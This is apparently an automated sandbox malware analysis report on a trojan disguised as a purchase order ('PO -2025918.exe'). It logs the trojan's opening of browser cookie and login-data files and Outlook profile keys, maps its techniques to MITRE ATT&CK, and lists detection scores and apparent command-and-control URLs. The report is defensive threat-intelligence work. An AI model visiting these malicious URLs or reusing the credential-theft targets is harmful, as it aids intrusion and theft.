                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO -2025918.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.7040000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.3777590.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.7040000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.2b71520.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.3777590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.2b71520.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.294f714.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                      Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\ROUTE.EXE; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.7040000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.3777590.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.7040000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.2b71520.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.3777590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.2b71520.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO -2025918.exe.294f714.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                      |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                      | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                      | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                      | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                      | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
                      | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                      | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                      | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                      | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                      | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                      [Behavior graph: ID 1592062, Sample: PO -2025918.exe, Startdate: 15/01/2025, Architecture: WINDOWS, Score: 100]

                      | Source | Detection | Scanner | Label | Link |
                      |---|---|---|---|---|
                      | PO -2025918.exe | 53% | Virustotal | | Browse |
                      | PO -2025918.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.CrypterX | |
                      | PO -2025918.exe | 100% | Joe Sandbox ML | | |
                      No Antivirus matches
                                                                                                            https://ac.ecosia.org/autocomplete?q=ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.fontbureau.com/designers/cabarga.htmlNPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.founder.com.cn/cnPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.fontbureau.com/designers/frere-user.htmlPO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.jiyu-kobo.co.jp/PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://static.fasthosts.co.uk/icons/favicon.icoROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://www.fontbureau.com/designers8PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&amp;V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9ROUTE.EXE, 00000009.00000002.3541757344.00000000042EC000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003E3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://www.vh5g.sbs/ROUTE.EXE, 00000009.00000002.3541757344.0000000003E36000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003986000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://www.fasthosts.co.uk?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_do_ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1592062
Start date and time: 2025-01-15 18:14:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO -2025918.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/7@11/8
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 180
• Number of non-executed functions: 291
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 13.107.246.45
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          No simulations
                                                                                                                          • 104.21.96.1
                                                                                                                          https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.21.79.87
                                                                                                                          DOCU800147001.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                          • 104.21.32.1
                                                                                                                          firstontario.docxGet hashmaliciousUnknownBrowse
                                                                                                                          • 1.1.1.1
                                                                                                                          lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.67.165
                                                                                                                          https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082Get hashmaliciousUnknownBrowse
                                                                                                                          • 104.21.78.33
                                                                                                                          https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''Get hashmaliciousUnknownBrowse
                                                                                                                          • 104.21.32.1
                                                                                                                          AMAZON-02UStxWVWM8Kx4.dllGet hashmaliciousWannacryBrowse
                                                                                                                          • 52.34.64.1
                                                                                                                          hNgIvHRuTU.dllGet hashmaliciousWannacryBrowse
                                                                                                                          • 13.229.164.57
                                                                                                                          https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQGet hashmaliciousUnknownBrowse
                                                                                                                          • 18.245.46.111
                                                                                                                          q4e7rZQEkL.dllGet hashmaliciousWannacryBrowse
                                                                                                                          • 54.76.228.176
                                                                                                                          firstontario.docxGet hashmaliciousUnknownBrowse
                                                                                                                          • 54.69.238.133
                                                                                                                          ACH REMITTANCE DOCUMENT 15.01.25.xlsbGet hashmaliciousUnknownBrowse
                                                                                                                          • 54.176.115.71
                                                                                                                          bot.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.214.77.3
                                                                                                                          bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 44.232.80.77
                                                                                                                          bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 52.77.51.103
                                                                                                                          bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 54.200.242.19
                                                                                                                          VIMRO-AS15189USPO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 67.223.117.189
                                                                                                                          Scanned-IMGS_from NomanGroup IDT.scr.exeGet hashmaliciousFormBookBrowse
